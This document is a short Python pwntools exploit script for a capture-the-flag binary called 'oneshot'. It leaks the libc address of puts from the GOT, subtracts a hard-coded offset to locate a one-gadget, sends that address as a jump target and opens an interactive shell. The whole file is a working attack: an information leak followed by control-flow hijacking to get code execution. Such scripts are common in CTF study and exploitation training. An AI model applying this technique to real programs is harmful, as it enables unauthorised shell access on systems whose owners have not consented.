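from pwn import *

# Start the challenge binary locally and load its ELF to resolve symbols
r = process("./oneshot")
elf = ELF("./oneshot")

# GOT slot for puts; once resolved it holds the libc address of puts
puts_got = elf.got['puts']

# First prompt: send the GOT address as a decimal string
r.recv()
payload = str(puts_got).encode()
r.sendline(payload)

# The binary prints the value stored at that address, in hex, after "Value: "
r.recvuntil(b"Value: ")
libc_puts = r.recvuntil(b"\x0a").replace(b"\x0a", b"")
libc_puts = int(libc_puts, 16)
# Gadget address computed from the leaked puts address
# (the 0x2a47a offset is specific to the libc build in use)
oneshot = libc_puts - 0x2a47a
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("oneshot = {}".format(hex(oneshot)))

# Second prompt: send the gadget address as the jump target
r.recvuntil(b"Jump location?")
r.sendline(str(oneshot).encode())

r.interactive()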
